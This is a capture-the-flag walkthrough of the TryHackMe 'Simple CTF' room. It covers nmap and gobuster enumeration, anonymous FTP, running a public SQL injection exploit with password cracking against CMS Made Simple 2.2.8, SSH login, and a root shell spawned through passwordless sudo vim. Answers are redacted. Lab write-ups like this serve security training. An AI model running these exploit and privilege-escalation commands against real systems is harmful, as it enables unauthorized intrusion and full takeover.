Simple CTF
This is a free TryHackMe CTF room created by MrSeth6797 that walks you through a series of questions as you work your way into a server hosting a CMS.
On the way to the user and root flags, the room asks you to identify:
- The number of services running under port 1000.
- The service running on the higher port.
- The CVE that can be used against the application.
- The type of vulnerability the application is vulnerable to.
- The user account and password that can be used to access the server.
- Any additional home directories other than the user account identified previously.
- The application that can be used to escalate privileges.
We will come across each of these as we move through the walkthrough.
For the purposes of this room:
- I may redact certain outputs. For this, I shall use #REDACTED.
- I shall use $VICTIM_IP to indicate the IP of the CTF virtual machine. You can replace this with the actual IP.
With all that said, let’s launch the virtual machine and get started!
What services exist on the server?
> nmap -sC -sV $VICTIM_IP
Starting Nmap 7.60 ( https://nmap.org ) at 2022-01-25 10:42 GMT
Nmap scan report for ip-10-10-71-122.eu-west-1.compute.internal ($VICTIM_IP)
Host is up (0.00043s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.172.4
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 5
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 2 disallowed entries
|_/ /openemr-5_0_1_3
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 29:42:69:14:9e:ca:d9:17:98:8c:27:72:3a:cd:a9:23 (RSA)
| 256 9b:d1:65:07:51:08:00:61:98:de:95:ed:3a:e3:81:1c (ECDSA)
|_ 256 12:65:1b:61:cf:4d:e5:75:fe:f4:e8:d4:6e:10:2a:f6 (EdDSA)
MAC Address: 02:01:A0:71:4F:45 (Unknown)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.10 seconds
From the scan we have identified 3 open services: ftp on port 21, http on port 80 and ssh on the non-standard port 2222. Note that -sC -sV without a -p argument only probes nmap's 1000 most common ports (2222 happens to be one of them); a full sweep with -p- is the way to confirm nothing else is listening before answering the port questions.
Question 1 : How many services are running under port 1000?
#REDACTED
Question 2: What is running on the higher port?
#REDACTED
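Two things are worth making mechanical here, as an added example that is not part of the room or of the original write-up: the full-port sweep followed by a script/version scan of only the ports it found (the usual two-stage approach, since -sC -sV alone covers just the top 1000 ports), and parsing nmap's grepable (-oG) output into the answers the room wants. The Ports: line below is constructed from the room's own results so the parsing runs offline; $VICTIM_IP and the file name full.gnmap are assumptions.

```shell
#!/bin/sh
# Added example, not part of the room: parse nmap grepable (-oG) output and drive a
# two-stage scan. Stage one, a full-port sweep (run against the target, not here):
#   nmap -p- --min-rate 1000 -oG full.gnmap "$VICTIM_IP"
# Stage two, scripts and version detection on just the ports stage one found:
#   nmap -sC -sV -p "$(port_list < full.gnmap)" "$VICTIM_IP"

# Constructed -oG "Host:" line built from the room's scan results (tab-separated fields).
GREPABLE=$(printf 'Host: 10.10.71.122 ()\tPorts: 21/open/tcp//ftp//vsftpd 3.0.3/, 80/open/tcp//http//Apache httpd 2.4.18 ((Ubuntu))/, 2222/open/tcp//ssh//OpenSSH 7.2p2 Ubuntu 4ubuntu2.8/\tIgnored State: filtered (65532)')

# Read -oG output on stdin and print "port service" for each open port.
# Each entry is port/state/proto/owner/service/rpcinfo/version/ and entries are
# comma-separated after "Ports:". (A comma inside a version banner would need -oX
# parsing instead; none of the banners here contain one.)
open_ports() {
    awk -F'\t' '
        /^Host: / {
            ports = ""
            for (i = 1; i <= NF; i++) if ($i ~ /^Ports: /) ports = substr($i, 8)
            n = split(ports, entry, ", *")
            for (i = 1; i <= n; i++) {
                split(entry[i], f, "/")
                if (f[2] == "open") print f[1], f[5]
            }
        }'
}

# Question 1: how many open services sit below a port threshold (1000 for the room).
count_open_below() {
    open_ports | awk -v max="$1" '$1 + 0 < max + 0 { n++ } END { print n + 0 }'
}

# Question 2: the service on the highest-numbered open port.
highest_open_service() {
    open_ports | sort -n | tail -n 1 | awk '{ print $2 }'
}

# Comma-separated port list for nmap's -p in stage two.
port_list() {
    open_ports | awk '{ printf "%s%s", (NR > 1 ? "," : ""), $1 } END { print "" }'
}

printf '%s\n' "$GREPABLE" | count_open_below 1000     # 2
printf '%s\n' "$GREPABLE" | highest_open_service      # ssh
printf '%s\n' "$GREPABLE" | port_list                 # 21,80,2222
```

The functions read whatever -oG output is piped in, so the same helpers work unchanged on the real full.gnmap from stage one.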
Let’s explore the FTP service
From the scan results we can see that FTP allows anonymous login. Through it we can retrieve a text file that tells us something important about one of the users: his system password is weak, and it is the same password he set elsewhere. This gives us confidence that a dictionary attack against his credentials could gain us access to the server.
> ftp $VICTIM_IP
Connected to $VICTIM_IP.
220 (vsFTPd 3.0.3)
Name ($VICTIM_IP:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Aug 17 2019 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 166 Aug 17 2019 ForMitch.txt
226 Directory send OK.
ftp> get ForMitch.txt
local: ForMitch.txt remote: ForMitch.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for ForMitch.txt (166 bytes).
226 Transfer complete.
166 bytes received in 0.00 secs (360.2431 kB/s)
ftp> exit
221 Goodbye.
>cat ForMitch.txt
Dammit man... you'te the worst dev i've seen. You set the same pass for the system user, and the password is so weak... i cracked it in seconds. Gosh... what a mess!
Let’s explore the HTTP service
The nmap output also shows that the HTTP service on port 80 has a robots.txt with two disallowed entries, / and /openemr-5_0_1_3. Browsing to /openemr-5_0_1_3 returns a "Not Found" page, so it is a dead end.
Brute-forcing the web root with gobuster, and then the /simple directory it reveals, turns up a number of directories and files, including the index.php of the CMS hosted on the server:
> gobuster dir -u $VICTIM_IP -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://$VICTIM_IP
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2022/01/25 11:07:27 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/index.html (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)
/simple (Status: 301)
===============================================================
2022/01/25 11:07:30 Finished
===============================================================
# Let's do a second gobuster against the 'simple' directory that we discovered
>gobuster dir -u $VICTIM_IP/simple -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://$VICTIM_IP/simple
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2022/01/25 11:07:53 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/admin (Status: 301)
/assets (Status: 301)
/doc (Status: 301)
/lib (Status: 301)
/modules (Status: 301)
/index.php (Status: 200)
/tmp (Status: 301)
/uploads (Status: 301)
===============================================================
2022/01/25 11:07:54 Finished
===============================================================
Opening /simple/index.php in the browser takes us to the CMS main page. A quick look around the site shows us:
- how to reach the admin login panel.
- the version of the CMS (CMS Made Simple 2.2.8).
A quick searchsploit query returns a candidate exploit that can be used to gain access to the CMS, and reading the header of the .py file (searchsploit -x 46635 shows the same thing) gives us the CVE that the vulnerability refers to:
> searchsploit CMS Made Simple 2.2.8
---------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------- ---------------------------------
CMS Made Simple < 2.2.10 - SQL Injection | php/webapps/46635.py
---------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
> find / -name "46635.py" -exec head -n 10 {} \; 2>/dev/null
#!/usr/bin/env python
# Exploit Title: Unauthenticated SQL Injection on CMS Made Simple <= 2.2.9
# Date: 30-03-2019
# Exploit Author: Daniele Scanu @ Certimeter Group
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: https://www.cmsmadesimple.org/downloads/cmsms/
# Version: <= 2.2.9
# Tested on: Ubuntu 18.04 LTS
# CVE : #REDACTED
Question 3: What’s the CVE you’re using against the application?
#REDACTED
Question 4: To what kind of vulnerability is the application vulnerable?
#REDACTED
Reading the code, running this exploit requires a couple of things on your machine:
- A Python 2 interpreter.
- The third-party Python 2 modules requests and termcolor (time, optparse and hashlib are part of the standard library and need no install).
If you are missing either module, install it with pip2 (pip2 install requests termcolor), or look in your Linux distribution's package manager for the Python 2 versions of the packages.
With that out of the way, you should be able to run the exploit script [which in my case is 46635.py] with the following arguments:
> python2 /opt/searchsploit/exploits/php/webapps/46635.py -u http://$VICTIM_IP/simple -w /usr/share/wordlists/rockyou.txt --crack
[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96
[+] Password cracked: #REDACTED
Question 5 : What’s the password?
#REDACTED
Let’s explore the SSH service
With a username and password, we can try to log into the server over SSH [on port 2222]. Once in, we can:
- List the contents of the user's home directory to find the user flag.
- List /home to find other potential users of the system.
> ssh mitch@$VICTIM_IP -p 2222
...
Warning: Permanently added '[$VICTIM_IP]:2222' (ECDSA) to the list of known hosts.
mitch@$VICTIM_IP's password: # Insert password here
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-58-generic i686)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
> ls -la
total 36
drwxr-x--- 3 mitch mitch 4096 Aug 19 2019 .
drwxr-xr-x 4 root root 4096 Aug 17 2019 ..
-rw------- 1 mitch mitch 178 Aug 17 2019 .bash_history
-rw-r--r-- 1 mitch mitch 220 Sep 1 2015 .bash_logout
-rw-r--r-- 1 mitch mitch 3771 Sep 1 2015 .bashrc
drwx------ 2 mitch mitch 4096 Aug 19 2019 .cache
-rw-r--r-- 1 mitch mitch 655 May 16 2017 .profile
-rw-rw-r-- 1 mitch mitch 19 Aug 17 2019 user.txt
-rw------- 1 mitch mitch 515 Aug 17 2019 .viminfo
> cat user.txt
#REDACTED
> ls ../
mitch #REDACTED
Question 6: Where can you login with the details obtained?
#REDACTED
Question 7: What’s the user flag?
#REDACTED
Question 8: Is there any other user in the home directory? What’s its name?
#REDACTED
A quick examination of the commands the user can run with sudo shows that mitch may run /usr/bin/vim as root without a password. Because vim can execute arbitrary shell commands, running it under sudo lets us spawn a bash shell with root privileges, after which we can read the final flag from the root user's home directory.
> sudo -l
User mitch may run the following commands on Machine:
(root) NOPASSWD: /usr/bin/vim
> sudo /usr/bin/vim
# Within vim, press ":" to enter command-line mode and run "!bash"; the shell it spawns inherits vim's root privileges. (sudo /usr/bin/vim -c ':!bash' does the same in one step.)
> cat /root/root.txt
#REDACTED
Question 9: What can you leverage to spawn a privileged shell?
#REDACTED
Question 10: What’s the root flag?
#REDACTED
And we are done!